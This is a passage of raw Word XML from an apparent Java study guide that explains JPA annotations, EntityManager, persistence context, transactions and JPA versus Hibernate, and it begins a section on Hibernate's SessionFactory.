        <w:t>: Marks a class as an entity that is mapped to a table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1926C8" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1993"/>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Id</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the primary key of the entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F1AF7A" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1993"/>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GeneratedValue</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the strategy for automatically generating primary key values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE5E004" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1993"/>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Table</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the name of the table to which the entity is mapped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCFEDAC" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1993"/>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olumn</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the mapping of a field to a database column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DD8879" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1993"/>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ManyToOne, @OneToMany, @ManyToMany, @OneToOne</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to define relationships between entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC94B24" w14:textId="77777777" w:rsidR="007B3D64"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563FFA">
          <v:rect id="_x0000_i2451" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2454A555" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64"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How JPA Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E576E17" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1994"/>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Entities:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Java classes annotated with @Entity are considered entities in JPA. These classes are mapped to tables in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B275BBE" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1994"/>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EntityManager:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EntityManager</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the core interface used for interacting with the persistence context (database). It provides methods to manage entities, including saving, deleting, and querying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF77DBD" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D6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xample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249F7CDA" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D6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ntityManager em = entityManagerFactory.createEntityManager();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15856BB9" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D6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m.persist(entity);  // Save the entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A825859" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1994"/>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Persistence Context:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">The persistence context is the environment in which entities are managed. Entities are either </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>managed</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (persisted in the context) or </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>detached</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (removed from the context).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35841464" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1994"/>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Transaction Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>JPA handles transactions to ensure that database operations are performed atomically. Operations are committed or rolled back as part of a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270F13CD" w14:textId="77777777" w:rsidR="007B3D64"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DE145F1">
          <v:rect id="_x0000_i2452" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0877604A" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64"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JPA vs. Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B5AEED" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199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lastRenderedPageBreak/>
        <w:t>JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specification</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that provides the structure for ORM, while </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>framework</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that implements this specification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6304B534" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199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Hibernate provides additional features beyond JPA, like caching, but JPA defines the core interface and operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A87670" w14:textId="77777777" w:rsidR="007B3D64"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6450C96">
          <v:rect id="_x0000_i2453" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D48BC4" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4002B951" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D6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JPA is a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java standard</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that defines how Java objects map to relational database tables, providing a powerful framework for managing persistence with automatic CRUD operations. It simplifies database interaction through </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Criteria API</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. JPA is commonly used with frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as its implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C529AA1" w14:textId="12D2297C" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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EA4C979">
          <v:rect id="_x0000_i2454" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C7F91" w14:textId="292DEA68" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA1AB4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="554" w:name="_Toc196308034"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Session factory in hibernate</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="554"/>
    </w:p>
    <w:p w14:paraId="0CE32746" w14:textId="361D6687" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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SessionFactory in Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016667E6" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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The </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a core interface in Hibernate that provides the functionality to create </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> objects. It is responsible for configuring Hibernate, managing the connection to the database, and creating </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instances that allow you to interact with the persistence context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AC9043" w14:textId="77777777" w:rsidR="00E90CAC"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453BF9C">
          <v:rect id="_x0000_i2455" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07272C8B" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC"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Key Points of SessionFactory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E4730B" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199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Factory for Sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1E165B" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="199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SessionFactory is responsible for creating </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> objects, which are used to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C8516" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="199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A </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> object is a single-threaded unit of work. It is used to perform CRUD operations, query the database, and manage the persistence context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9A89A2" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199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onfiguration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099F1A98" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="199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SessionFactory is typically configured using the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hibernate.cfg.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration file or programmatically through </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CBEDBF" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="199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t holds Hibernate's configuration settings, such as database connection settings, dialect, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256C7887" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199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Thread-Safe Singleton:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D58991A" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
